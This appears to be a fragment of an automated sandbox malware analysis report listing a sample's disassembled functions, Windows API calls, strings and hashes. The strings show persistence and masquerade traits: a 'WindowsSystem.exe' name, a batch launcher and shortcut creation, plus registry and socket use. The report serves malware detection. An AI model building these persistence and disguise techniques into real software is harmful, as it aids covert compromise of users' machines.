                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312396
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003123AB
                                                                                                            • __snwprintf.LIBCMT ref: 003123D5
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 003123E3
                                                                                                            • GetLastError.KERNEL32 ref: 003123F2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031240A
                                                                                                            • __snwprintf.LIBCMT ref: 00312439
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0031245B
                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 00312487
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00312499
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124C3
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003124CD
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003124D7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124E1
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124EB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003124F5
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031250C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312516
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312520
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031252A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312534
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031253E
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00312548
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312552
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocTask$__snwprintf$FolderKnownPathlstrlen$CloseCreateFileHandle$DirectoryErrorLastWrite__snprintf
                                                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S$WindowsSystem.exe${18925F49-C14F-4A5B-BA0F-9C4106DA4CB0}${34E50511-FBB8-42F8-98A2-2629192A03A0}${9771290C-19FB-4434-8B1F-8952BA10F287}${A786AA22-8EF1-44CE-8698-6F3988CB643E}
                                                                                                            • API String ID: 2364451356-46602529
                                                                                                            • Opcode ID: 283382d6433c60010dc16610899b8523cc1b9ef441da1fa062674b45a8a1f916
                                                                                                            • Instruction ID: 0ef30adfa3466ce0f47fbc22f22966fb0eb835594f79f240700b3e97774a3ef2
                                                                                                            • Opcode Fuzzy Hash: 283382d6433c60010dc16610899b8523cc1b9ef441da1fa062674b45a8a1f916
                                                                                                            • Instruction Fuzzy Hash: 5E715EB5E40205EBDB26DBA4DC8AFEEBB79AF4C710F108518F605B62D0D7749980CB60
                                                                                                            Function 0031FFF0 Relevance: 61.9, APIs: 41, Instructions: 361networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0031FFFF
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320015
                                                                                                            • shutdown.WS2_32(000000FF,00000002), ref: 003204D0
                                                                                                            • closesocket.WS2_32(000000FF), ref: 003204DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventclosesocketshutdownsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3702629066-0
                                                                                                            • Opcode ID: 15924345f88df42b2d5bca7cf895c3a439c203bc900b76e6cea17a0fb3e695ba
                                                                                                            • Instruction ID: 7329269bfac8f817bc818e98a68f32684539a175966eacd0543fb073676c4cdf
                                                                                                            • Opcode Fuzzy Hash: 15924345f88df42b2d5bca7cf895c3a439c203bc900b76e6cea17a0fb3e695ba
                                                                                                            • Instruction Fuzzy Hash: 4AF15074900228EFDF29DFA4E888BEDB7B9FF48310F208559E519A7251D7349A84DF50
                                                                                                            Function 00304C30 Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 257filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00304C50
                                                                                                            • _memset.LIBCMT ref: 00304C6F
                                                                                                            • _memset.LIBCMT ref: 00304C8E
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00304CAF
                                                                                                            • __snwprintf.LIBCMT ref: 00304CD8
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00304CE7
                                                                                                            • _memset.LIBCMT ref: 00304D06
                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00304D1A
                                                                                                            • __snwprintf.LIBCMT ref: 00304D3C
                                                                                                            • __snwprintf.LIBCMT ref: 00304D7C
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00304D8D
                                                                                                            • GetLastError.KERNEL32 ref: 00304D99
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00304DCF
                                                                                                            • __snwprintf.LIBCMT ref: 00304DF6
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00304E17
                                                                                                            • GetLastError.KERNEL32 ref: 00304E2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __snwprintf_memset$CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                                                                                                            • API String ID: 37154465-2887319354
                                                                                                            • Opcode ID: b57003a8b69f40df5e6a721865c528d55f97e894fcd6fecc8a21cea3b1bbae5a
                                                                                                            • Instruction ID: ceb247dfef0921ea2a49ce56cf872340aebff7ab17b9c9912c23038a1e7a45f6
                                                                                                            • Opcode Fuzzy Hash: b57003a8b69f40df5e6a721865c528d55f97e894fcd6fecc8a21cea3b1bbae5a
                                                                                                            • Instruction Fuzzy Hash: 70A176B1A10318ABDB25DB60DC89FDA7779AF98704F004598F60DAA1C1EB749BC4CF91
                                                                                                            Function 0030BE80 Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 217memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 0030BE96
                                                                                                              • Part of subcall function 00301C80: CreateEventW.KERNEL32(00000000,00000001,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00301CA2
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301CCC
                                                                                                              • Part of subcall function 00301C80: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00301CE0
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301D05
                                                                                                              • Part of subcall function 00301C80: __snwprintf.LIBCMT ref: 00301D2F
                                                                                                              • Part of subcall function 00301C80: _memset.LIBCMT ref: 00301D70
                                                                                                              • Part of subcall function 00301C80: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00301D84
                                                                                                              • Part of subcall function 00301C80: LocalAlloc.KERNEL32(00000040,00000DF0), ref: 00301DA3
                                                                                                              • Part of subcall function 00301C80: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00301DC1
                                                                                                              • Part of subcall function 00301C80: GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00301DD9
                                                                                                              • Part of subcall function 00301C80: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00301DF3
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00301E14
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00301E2B
                                                                                                              • Part of subcall function 00301C80: lstrcpyW.KERNEL32(-00000648,00000000), ref: 00301E42
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030BF0A
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030BF5C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BF90
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030BFC6
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C019
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030C035
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030C042
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C04F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030C05C
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030C068
                                                                                                            • closesocket.WS2_32(?), ref: 0030C072
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocal$_memsetlstrcpy$AddressAllocDirectoryFreeHandleProcWow64$CloseCreateCurrentDisableModuleOpenRedirectionWindows__snwprintfclosesocketsetsockoptshutdownwnsprintf
                                                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 535781040-2280803059
                                                                                                            • Opcode ID: 3d2c04497036cc5447225c36f04bbc28f299c374c1232b59eca25933a64b0735
                                                                                                            • Instruction ID: ef908b84d178b960eb5a1a6961d95c12744039f96b095d4bdd6d58a5394823ea
                                                                                                            • Opcode Fuzzy Hash: 3d2c04497036cc5447225c36f04bbc28f299c374c1232b59eca25933a64b0735
                                                                                                            • Instruction Fuzzy Hash: E2915CB5A10218EFDB36DBA4DC59BADB778BF48300F1041A8F60DA6291D7749AC4CF11
                                                                                                            Function 003097A0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 292registrymemorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00309811
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0030982C
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 0030983B
                                                                                                            • _memset.LIBCMT ref: 0030985D
                                                                                                            • __snwprintf.LIBCMT ref: 0030987B
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 003098AA
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 003098DA
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 00309915
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocalValue$__snwprintf_memsetlstrcpy
                                                                                                            • String ID: (Z6$.DLL$SOFTWARE\%s$rT=${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 2286648044-2150405501
                                                                                                            • Opcode ID: 136e8dd978d9e6093687f022c2c9196b6c2fe3f906700273efeaf930750b9381
                                                                                                            • Instruction ID: 3e9f45c1e1ec63c6d96890ce2774413aa6eaf0614f77e0a5fb9988463864c194
                                                                                                            • Opcode Fuzzy Hash: 136e8dd978d9e6093687f022c2c9196b6c2fe3f906700273efeaf930750b9381
                                                                                                            • Instruction Fuzzy Hash: 64D15974E012189FDB25DB64DC9DBAAB7B8AF88300F1085D9E50DAB291DB709E80CF51
                                                                                                            Function 00308CD0 Relevance: 52.8, APIs: 27, Strings: 3, Instructions: 290memoryfilestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00308D3E
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00308D59
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00308D68
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00308D8D
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 00308DA6
                                                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 00308DBF
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 00308DE4
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00308DFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                                                            • String ID: (Z6$.DLL$rT=
                                                                                                            • API String ID: 2968648924-93524146
                                                                                                            • Opcode ID: 7b38cf283f6a8524713e1b0b8a6138d205d73e999f094a423d2d44c0a230da1a
                                                                                                            • Instruction ID: a761c7f38a10abc072bd103fa445f7f7332da028819c37c92df63433c9a6a9e2
                                                                                                            • Opcode Fuzzy Hash: 7b38cf283f6a8524713e1b0b8a6138d205d73e999f094a423d2d44c0a230da1a
                                                                                                            • Instruction Fuzzy Hash: CEC14C75E01208EBDB29DFE4DC99BEEBB79BF48300F108529E615AB290C7359981CF50
                                                                                                            Function 003075B0 Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 285registryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00307603
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00307813
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0030783A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030785B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307868
                                                                                                            • __snwprintf.LIBCMT ref: 0030789D
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 003078B8
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 00307910
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00307937
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307958
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307965
                                                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 0030799A
                                                                                                            • _memset.LIBCMT ref: 003079D5
                                                                                                            • __snwprintf.LIBCMT ref: 003079F3
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 00307A15
                                                                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 00307A2D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00307A4D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307A5A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00307A67
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00307AA0
                                                                                                            • closesocket.WS2_32(?), ref: 00307AAA
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Delete$AllocFileInfoLocale___crt__snwprintfwnsprintf$CloseOpenValue_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: $#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 421061684-1784904374
                                                                                                            • Opcode ID: 78575592498caaf7cce90d6c60e05bf29cb055c747ba4ed46b29bb7b34bd7d7b
                                                                                                            • Instruction ID: 51e16ddfcead1329c20b175efdca8543a824193857501041640a9bb32f80eee0
                                                                                                            • Opcode Fuzzy Hash: 78575592498caaf7cce90d6c60e05bf29cb055c747ba4ed46b29bb7b34bd7d7b
                                                                                                            • Instruction Fuzzy Hash: 74D117B1D002299BEB25DF50CC89BEEB7B8BF44304F10C5D9E549AB281DB759A84DF90
                                                                                                            Function 00307AC0 Relevance: 49.4, APIs: 25, Strings: 3, Instructions: 403registrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00307B13
                                                                                                            • _memset.LIBCMT ref: 00307BA4
                                                                                                            • __snwprintf.LIBCMT ref: 00307BC2
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 00307BEC
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00307C80
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00308096
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080AC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080C2
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003080D8
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 003080F7
                                                                                                            • closesocket.WS2_32(?), ref: 00308101
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$InfoLocale___crt$AllocCloseCreate__snwprintf_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: SOFTWARE\%s$rT=${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 1227969885-643280724
                                                                                                            • Opcode ID: e6ee4b68e6b2117bf2746ff0a23a19ae02172fe0611ab9b8ed62ac8d63a1634a
                                                                                                            • Instruction ID: 021e827a25a24898b8dcd811ab1af9794fab9b4df43316b7843908155e710e09
                                                                                                            • Opcode Fuzzy Hash: e6ee4b68e6b2117bf2746ff0a23a19ae02172fe0611ab9b8ed62ac8d63a1634a
                                                                                                            • Instruction Fuzzy Hash: AB025CB0D01219EBEB36CB54CC59BAAB778BF48310F108298E659A72C1DB715EC5CF61
                                                                                                            Function 0031BB20 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 244librarymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 0031BB32
                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0031BB42
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031BB59
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0031BB7D
                                                                                                            • ExitProcess.KERNEL32 ref: 0031BE75
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316BFC
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C14
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C2A
                                                                                                              • Part of subcall function 00316BE0: SetEvent.KERNEL32(00000000,?,0031BE80), ref: 00316C3F
                                                                                                              • Part of subcall function 00316BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE80), ref: 00316C57
                                                                                                              • Part of subcall function 00316BE0: CloseHandle.KERNEL32(00000000,?,0031BE80), ref: 00316C6D
